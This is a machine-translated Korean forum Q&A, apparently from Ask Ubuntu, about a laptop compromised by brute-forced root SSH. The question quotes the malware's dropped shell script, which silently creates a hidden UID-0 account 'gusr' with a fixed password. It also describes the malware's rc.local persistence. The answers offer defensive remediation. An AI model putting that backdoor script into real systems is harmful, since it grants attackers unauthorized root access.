랩톱에서 맬웨어를 처리하는 방법은 무엇입니까?


12

내 Ubuntu 13.10 랩톱이 일종의 맬웨어에 감염되어 있다고 확신합니다.

가끔씩 / lib / sshd (루트 소유) 프로세스가 실행되고 많은 CPU를 소비한다는 것을 알았습니다. / usr / sbin / sshd를 실행하는 것은 sshd 서버가 아닙니다.

바이너리에는 --wxrw-rwt 권한이 있으며 / lib 디렉토리에 스크립트를 생성하고 생성합니다. 최근 이름은 13959730401387633604이며 다음을 수행합니다.

#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd

gusr 사용자는 맬웨어에 의해 독립적으로 생성 된 다음 100 % CPU를 사용하면서 chpasswd가 정지됩니다.

지금까지 gusr 사용자가 / etc /의 파일에 추가되었다는 것을 확인했습니다.

/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid

맬웨어가 "-"접미사를 사용하여 이러한 모든 파일의 복사본을 만든 것 같습니다. 루트가 수정 한 / etc / 파일의 전체 목록은 여기에서 볼 수 있습니다 .

또한 / etc / hosts 파일이 this 로 변경되었습니다 .

/ lib / sshd는 /etc/init.d/rc.local 파일의 끝에 자신을 추가하여 시작합니다!

사용자를 제거하고 파일을 제거하고 처리 된 트리를 종료하고 암호를 변경하고 ssh 공개 키를 제거했습니다.

나는 기본적으로 망했다는 것을 알고 있으며 전체 시스템을 다시 설치할 것입니다. 그럼에도 불구하고 다른 여러 컴퓨터에 로그인했기 때문에 최소한 제거하고 시도하는 방법을 알아내는 것이 좋습니다. 이 문제를 해결하는 방법에 대한 제안은 감사하겠습니다.

3 월 25 일에 루트 로그인을 강제로 수행 한 것으로 보입니다. 우분투에서 루트 ssh가 기본적으로 활성화되어 있다는 것을 몰랐습니다. 나는 그것을 비활성화하고 거부 호스트를 세웠다.

로그인은 홍콩 어딘가에 59.188.247.236에서 시작되었습니다.

나는 EmperorLinux에서 랩톱을 얻었고 루트 액세스를 가능하게했습니다. 그중 하나가 있고 sshd를 실행중인 경우주의하십시오.


2
기기를 네트워크에서 분리하십시오! 지금!
Seth

2
그리고 왜 루트 로그인이 가능합니까? 그것은 당신이 뭔가 좋은 이유없이 수 있습니다.
세스

@Seth 활성화하지 않았 으며 우분투 에서는 기본적 으로 켜져 있습니다. 당신만큼 놀랍습니다.
Dejan Jovanović

1
" 기본적으로 SSH 데몬은 원격 루트 로그인이 활성화 된 상태로 제공됩니다. 일반적으로 Ubuntu는 루트 사용자에 대한 직접 액세스를 허용하지 않으므로이 설정은 중요하지 않습니다. 루트 계정에 비밀번호를 설정 한 경우이 설정이 잠재적 일 수 있습니다 보안 위험이 있으므로 비활성화해야합니다. "
Seth

1
나는 이것이 아니라고 확신합니다 Linux/Ebury. 그것은 다른 것이고 아마도 이름이 할당되지 않았을 것입니다. Ebury는 새 사용자 계정을 만들지 않으며 sshd라는 새 바이너리에 포함되지 않고 openssh에서 사용하는 공유 라이브러리를 수정했습니다.
Riking

답변:


11

먼저 그 기계를 네트워크에서 분리하십시오!

둘째, 왜 루트 계정을 활성화 했습니까? 그럴만한 이유가 없다면 루트 계정을 활성화하지 마십시오.

셋째, 예, 확실하게 확인하는 유일한 방법은 새로 설치하는 것입니다. 또한 모든 것이 언제 시작되었는지 확신 할 수 없으므로 새로 시작하고 백업으로 돌아 가지 않는 것이 좋습니다.

또한 다음 설치에서 방화벽을 설정하고 들어오는 모든 연결을 거부하는 것이 좋습니다.

sudo ufw default deny incoming

ssh를 다음과 같이 허용하십시오.

sudo ufw allow ssh

루트 계정을 활성화하지 마십시오! 물론 루트 SSH 로그인이 비활성화되어 있는지 확인하십시오.


4
루트 계정을 확인했습니다. Emperorlinux에서 랩톱을 가져 와서 계정을 설정했습니다. 바보.
Dejan Jovanović

1
@ DejanJovanović 끔찍하다!
Seth
당사 사이트를 사용함과 동시에 당사의 쿠키 정책개인정보 보호정책을 읽고 이해하였음을 인정하는 것으로 간주합니다.
Licensed under cc by-sa 3.0 with attribution required.